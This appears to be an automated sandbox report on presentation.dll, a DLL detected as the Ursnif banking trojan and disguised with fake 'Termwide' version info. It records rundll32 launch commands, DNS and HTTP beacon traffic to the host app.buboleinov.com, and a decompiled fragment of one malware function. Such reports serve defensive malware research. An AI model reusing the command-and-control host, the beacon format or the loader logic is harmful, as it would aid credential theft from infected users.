Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.440534734931472
Encrypted:	false
SSDEEP:	3:oVXUWQuXfmEqH8JOGXnEWQuXfmEZun:o9UXYehHqEXYed
MD5:	337C7ABD96ABBAE48D3334B09D918018
SHA1:	9D3673103FC0E9E29C10689E5D7A33EB8FE1292B
SHA-256:	7429818A07E321667F900E52C0A74B786E744F233F33F16E60BC091DC5C9E0F3
SHA-512:	881B5BFEAA4F21B4282797BBB2092681BF4D32F4EC6B602D12E3E327107570B452E9B847A3485E140291BF9197DFD8499B7A804CF644916ABF75691964646AF6
Malicious:	false
Preview:	[2021/05/05 12:53:37.917] Latest deploy version: ..[2021/05/05 12:53:37.917] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF615A7858A33FDD4B.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40153
Entropy (8bit):	0.6680819612631073
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+ewe2esete2erUiFO48G3sxUiFO48G3syUiFO48G3sH:kBqoxKAuqR+Z3lUX6Hl/YHl/LHl/8
MD5:	F6A18585F58F28D0865FABEF22178F85
SHA1:	FCFAC439D675E64C4A8A654EF3DBBC25698E6927
SHA-256:	56DE1E56B45194300E42201A5AB96792E73EDD6D4C6867EC9608D3888489162C
SHA-512:	80320E170D9F102DB253196823283FCCC3AD411ADEFC4DA073C7C0F96FAF1EEDF6E481414E437950D61981F01DE0D2946354257F3CFF8390048D486284C9A53E
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE183529A9C549E1C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4098284740596134
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lok9lo09lW82DN2+/:kBqoIPZ8ANB/
MD5:	EDFD47AA0AB0E70499337009970D93AD
SHA1:	12E92A6960D3FEAF2379B3EF2FE12834F3B5A339
SHA-256:	581389B2E758E1D3D9A77D3605813C07E389F81C817DA00AB922E94CA29653BC
SHA-512:	4C477F2731E4F4CBF73CEF1C77C46A85125520E3A9FF65CFD6618A4891231B4EB1714BE211FEA1FD2BE8E612582779C1042A5C9A8DA906AF4D96E82F78957B8C
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.151629290740381
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	presentation.dll
File size:	317952
MD5:	9debcd929765390555ca123c0076eea4
SHA1:	d0c68d1d874a877dbbbce1fea0bb164c6bdad642
SHA256:	9969cfd81612d1efbc5e983b57ff2fa2a69a3f6a6812c6da8382bf0c22014cf4
SHA512:	6c81556e2438ee04d5fae0e0b069d1558c2ab0fa2023915dad80203cca62b16f6dcf797bd58c854cfa5fdb113bf831cf2f7a040a287a66efa9637f64c35fd9ab
SSDEEP:	6144:ZUQrm4xMOQVFUy/kLYFnEaynGFa7ygc8eY:ZUelqO0REa2G0egJ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7. cs.N0s.N0s.N0m..0c.N0m..0:.N0z..0t.N0s.O0'.N0m..0Q.N0m..0r.N0m..0r.N0m..0r.N0Richs.N0................PE..L....Ay`...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1033ecf
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x60794100 [Fri Apr 16 07:47:12 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	28e501612900311a5e5c7fed3dd79d00

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F79888EDA77h
call 00007F79888F088Ah
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007F79888ED961h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push esi
push 00000001h
push 0104B110h
mov esi, ecx
call 00007F79888F0960h
mov dword ptr [esi], 01007B18h
mov eax, esi
pop esi
ret
mov dword ptr [ecx], 01007B18h
jmp 00007F79888F0A20h
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov dword ptr [esi], 01007B18h
call 00007F79888F0A0Dh
test byte ptr [ebp+08h], 00000001h
je 00007F79888EDA79h
push esi
call 00007F79888F0C37h
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F79888F0931h
mov dword ptr [esi], 01007B18h
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 0Ch
jmp 00007F79888EDA7Fh
push dword ptr [ebp+08h]
call 00007F79888EF6DCh
pop ecx
test eax, eax
je 00007F79888EDA81h
push dword ptr [ebp+08h]
call 00007F79888ED69Ah
pop ecx
test eax, eax
je 00007F79888EDA58h
leave
ret
test byte ptr [01153F80h], 00000001h
mov esi, 01153F74h
jne 00007F79888EDA8Bh
or dword ptr [01153F80h], 01h

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[ASM] VS2008 build 21022
[LNK] VS2008 build 21022
[RES] VS2008 build 21022
[EXP] VS2008 build 21022
[IMP] VS2008 SP1 build 30729
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4acc0	0x54	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4a4d4	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x155000	0x468	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x156000	0x1488	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1190	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa048	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x15c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x49d14	0x49e00	False	0.632693527919	data	6.20599588203	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x4b000	0x109ba0	0x1000	False	0.249755859375	data	2.58806537383	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x155000	0x468	0x600	False	0.354166666667	data	2.94194825311	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x156000	0x20d4	0x2200	False	0.5	data	4.90185749017	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x1550a0	0x330	data	English	United States
RT_MANIFEST	0x1553d0	0x91	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	OpenMutexW, VirtualProtectEx, CreateProcessW, GetCurrentDirectoryW, GetFileAttributesW, CompareStringW, CompareStringA, GetLastError, HeapFree, HeapAlloc, GetCurrentThreadId, GetCommandLineA, HeapCreate, HeapDestroy, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, GetCurrentThread, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, LoadLibraryA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoW, GetLocaleInfoA, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetStringTypeA, MultiByteToWideChar, GetStringTypeW, LCMapStringA, LCMapStringW, GetTimeZoneInformation, SetEnvironmentVariableA
ADVAPI32.dll	RegCloseKey, RegCreateKeyW, RegOpenKeyExW, RegQueryValueExA
XOLEHLP.dll

Exports

Name	Ordinal	Address
Hadlaw	1	0x1033719
Might	2	0x103394e

Version Infos

Description	Data
LegalCopyright	Termwide Corporation. All rights reserved
InternalName	Go
FileVersion	2.3.6.358
CompanyName	Termwide Corporation
ProductName	Termwide Grass fire
ProductVersion	2.3.6.358
FileDescription	Termwide Grass fire Untilsuccess
OriginalFilename	Flower.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 5, 2021 12:53:10.657921076 CEST	49722	80	192.168.2.7	34.86.224.8
May 5, 2021 12:53:10.657957077 CEST	49721	80	192.168.2.7	34.86.224.8
May 5, 2021 12:53:10.782052994 CEST	80	49722	34.86.224.8	192.168.2.7
May 5, 2021 12:53:10.782185078 CEST	49722	80	192.168.2.7	34.86.224.8
May 5, 2021 12:53:10.782567024 CEST	80	49721	34.86.224.8	192.168.2.7
May 5, 2021 12:53:10.782696962 CEST	49721	80	192.168.2.7	34.86.224.8
May 5, 2021 12:53:10.783261061 CEST	49722	80	192.168.2.7	34.86.224.8
May 5, 2021 12:53:10.949968100 CEST	80	49722	34.86.224.8	192.168.2.7
May 5, 2021 12:53:11.556493998 CEST	80	49722	34.86.224.8	192.168.2.7
May 5, 2021 12:53:11.556581020 CEST	49722	80	192.168.2.7	34.86.224.8
May 5, 2021 12:53:11.558764935 CEST	49722	80	192.168.2.7	34.86.224.8
May 5, 2021 12:53:11.683712959 CEST	80	49722	34.86.224.8	192.168.2.7
May 5, 2021 12:53:12.818595886 CEST	49721	80	192.168.2.7	34.86.224.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 5, 2021 12:51:07.527060986 CEST	50848	53	192.168.2.7	8.8.8.8
May 5, 2021 12:51:07.575766087 CEST	53	50848	8.8.8.8	192.168.2.7
May 5, 2021 12:51:08.701751947 CEST	61242	53	192.168.2.7	8.8.8.8
May 5, 2021 12:51:08.769575119 CEST	53	61242	8.8.8.8	192.168.2.7
May 5, 2021 12:51:10.040729046 CEST	58562	53	192.168.2.7	8.8.8.8
May 5, 2021 12:51:10.091387987 CEST	53	58562	8.8.8.8	192.168.2.7
May 5, 2021 12:51:10.935476065 CEST	56590	53	192.168.2.7	8.8.8.8
May 5, 2021 12:51:10.986607075 CEST	53	56590	8.8.8.8	192.168.2.7
May 5, 2021 12:51:12.011157990 CEST	60501	53	192.168.2.7	8.8.8.8
May 5, 2021 12:51:12.062582016 CEST	53	60501	8.8.8.8	192.168.2.7
May 5, 2021 12:51:13.227658987 CEST	53775	53	192.168.2.7	8.8.8.8
May 5, 2021 12:51:13.279352903 CEST	53	53775	8.8.8.8	192.168.2.7
May 5, 2021 12:51:14.198093891 CEST	51837	53	192.168.2.7	8.8.8.8
May 5, 2021 12:51:14.249691963 CEST	53	51837	8.8.8.8	192.168.2.7
May 5, 2021 12:51:15.168385029 CEST	55411	53	192.168.2.7	8.8.8.8
May 5, 2021 12:51:15.220807076 CEST	53	55411	8.8.8.8	192.168.2.7
May 5, 2021 12:51:37.306358099 CEST	63668	53	192.168.2.7	8.8.8.8
May 5, 2021 12:51:37.366440058 CEST	53	63668	8.8.8.8	192.168.2.7
May 5, 2021 12:52:03.938519955 CEST	54640	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:03.999603033 CEST	53	54640	8.8.8.8	192.168.2.7
May 5, 2021 12:52:11.432591915 CEST	58739	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:11.493288040 CEST	53	58739	8.8.8.8	192.168.2.7
May 5, 2021 12:52:12.722719908 CEST	60338	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:12.772093058 CEST	53	60338	8.8.8.8	192.168.2.7
May 5, 2021 12:52:14.136724949 CEST	58717	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:14.194367886 CEST	53	58717	8.8.8.8	192.168.2.7
May 5, 2021 12:52:16.115958929 CEST	59762	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:16.168989897 CEST	53	59762	8.8.8.8	192.168.2.7
May 5, 2021 12:52:17.303625107 CEST	54329	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:17.352282047 CEST	53	54329	8.8.8.8	192.168.2.7
May 5, 2021 12:52:18.407641888 CEST	58052	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:18.461596966 CEST	53	58052	8.8.8.8	192.168.2.7
May 5, 2021 12:52:19.618488073 CEST	54008	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:19.667156935 CEST	53	54008	8.8.8.8	192.168.2.7
May 5, 2021 12:52:21.217267036 CEST	59451	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:21.266094923 CEST	53	59451	8.8.8.8	192.168.2.7
May 5, 2021 12:52:23.682877064 CEST	52914	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:23.731807947 CEST	53	52914	8.8.8.8	192.168.2.7
May 5, 2021 12:52:24.504023075 CEST	64569	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:24.564321995 CEST	53	64569	8.8.8.8	192.168.2.7
May 5, 2021 12:52:24.746968985 CEST	52816	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:24.795684099 CEST	53	52816	8.8.8.8	192.168.2.7
May 5, 2021 12:52:25.702385902 CEST	50781	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:25.765597105 CEST	53	50781	8.8.8.8	192.168.2.7
May 5, 2021 12:52:26.864789009 CEST	54230	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:26.913532972 CEST	53	54230	8.8.8.8	192.168.2.7
May 5, 2021 12:52:27.795420885 CEST	54911	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:27.844294071 CEST	53	54911	8.8.8.8	192.168.2.7
May 5, 2021 12:52:50.267683029 CEST	49958	53	192.168.2.7	8.8.8.8
May 5, 2021 12:52:50.343266010 CEST	53	49958	8.8.8.8	192.168.2.7
May 5, 2021 12:53:08.797975063 CEST	50860	53	192.168.2.7	8.8.8.8
May 5, 2021 12:53:08.856270075 CEST	53	50860	8.8.8.8	192.168.2.7
May 5, 2021 12:53:10.286233902 CEST	50452	53	192.168.2.7	8.8.8.8
May 5, 2021 12:53:10.623338938 CEST	53	50452	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 5, 2021 12:53:10.286233902 CEST	192.168.2.7	8.8.8.8	0xd7c8	Standard query (0)	app.buboleinov.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 5, 2021 12:53:10.623338938 CEST	8.8.8.8	192.168.2.7	0xd7c8	No error (0)	app.buboleinov.com		34.86.224.8	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

app.buboleinov.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49722	34.86.224.8	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2021 12:53:10.783261061 CEST	1498	OUT	GET /bMm8AkF4K_2F_2FveRzR2f/nYi0xtk5xaARe/_2F_2Fyn/MhC_2BrW8ZBR5d6Ebe1q1AA/_2FUVq6FVw/212_2Fmya7wvf6qm5/W9P25GOkXEp_/2B7Ii5Reomx/DNGUxpOts5V_2F/m1ZCLgb0yZELhr1HDh2za/sK1pwrtT_2FYeJvy/UKI9xt8zwa55YYh/KZ8_2FX9rMmmJgeD_2/F8QbTyDtN/gF0rE8FYow3_2Fnp33aS/fsqd8_2FyHPS0_2Bp5_/2FbtiZGb31ZO5pN2ppiKul/1QXBqN9S9lxCI/vSq83RG3/yyRImlzN5vRP_2Bwx60Qoqa/1yNTVkSL_2Bp8is/j0c4aw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: app.buboleinov.com Connection: Keep-Alive
May 5, 2021 12:53:11.556493998 CEST	1498	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 05 May 2021 10:53:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5564 Parent PID: 5768

General

Start time:	12:51:43
Start date:	05/05/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\presentation.dll'
Imagebase:	0x1c0000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000003.363425153.00000000014C0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5608 Parent PID: 5564

General

Start time:	12:51:43
Start date:	05/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1
Imagebase:	0x870000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 204 Parent PID: 5564

General

Start time:	12:51:43
Start date:	05/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\presentation.dll,Hadlaw
Imagebase:	0xa40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.353723061.0000000004820000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1004 Parent PID: 5608

General

Start time:	12:51:43
Start date:	05/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1
Imagebase:	0xa40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.496778045.0000000005918000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.496874828.0000000005918000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.352567979.0000000002EE0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.496855209.0000000005918000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.496831807.0000000005918000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.496666566.0000000005918000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.496741796.0000000005918000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.496893630.0000000005918000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.496622014.0000000005918000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4152 Parent PID: 5564

General

Start time:	12:51:46
Start date:	05/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\presentation.dll,Might
Imagebase:	0xa40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.362002402.0000000003460000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4784 Parent PID: 792

General

Start time:	12:53:36
Start date:	05/05/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff699dd0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5260 Parent PID: 4784

General

Start time:	12:53:37
Start date:	05/05/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4784 CREDAT:17410 /prefetch:2
Imagebase:	0xd50000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5564 Parent PID: 5768 loaddll32.exeCOMMON

Executed Functions

Function 6D6417A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6D6417A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6D64146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6D6415A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6D641C12(_t45);
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6D641CA4(E6D6416EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6D641D7C(_t45,  &_v48) != 0) {
					 *0x6d6441b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t50 =  *_t57(_t44, 0, 0);
				if(_t50 == 0) {
					L9:
					 *0x6d6441b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6D641C8F(_t50 + _t15);
				 *0x6d6441b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50);
					E6D64136A(_t44);
					goto L11;
				}
			}

0x6d6417b3
0x6d6417bc
0x6d6417c0
0x6d6418c8
0x6d6418ce
0x00000000
0x00000000
0x00000000
0x6d6417c6
0x6d6417c6
0x6d6417cb
0x6d6417d1
0x6d6417e0
0x6d6417e1
0x6d6417e4
0x6d6417e7
0x6d6417f0
0x6d6417f4
0x6d6417fa
0x6d6417fe
0x6d641805
0x00000000
0x00000000
0x6d64180b
0x6d641812
0x6d641816
0x6d6418b9
0x6d6418b9
0x6d6418c0
0x6d6418c2
0x6d6418c2
0x00000000
0x6d6418c0
0x6d64181f
0x6d641872
0x6d641872
0x6d641883
0x6d641887
0x6d6418b5
0x6d641889
0x6d64188c
0x6d641894
0x6d641898
0x6d6418a0
0x6d6418a0
0x6d6418a7
0x6d6418a7
0x00000000
0x6d641887
0x6d64182d
0x6d64186c
0x00000000
0x6d64186c
0x6d64182f
0x6d641833
0x6d64183e
0x6d641842
0x6d641864
0x6d641864
0x00000000
0x6d641864
0x6d641844
0x6d641849
0x6d641850
0x6d641855
0x00000000
0x6d641857
0x6d64185a
0x6d64185d
0x00000000
0x6d64185d

APIs

Part of subcall function 6D64146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D6417B8,76D263F0,00000000), ref: 6D64147B
Part of subcall function 6D64146C: GetVersion.KERNEL32 ref: 6D64148A
Part of subcall function 6D64146C: GetCurrentProcessId.KERNEL32 ref: 6D641499
Part of subcall function 6D64146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D6414B2

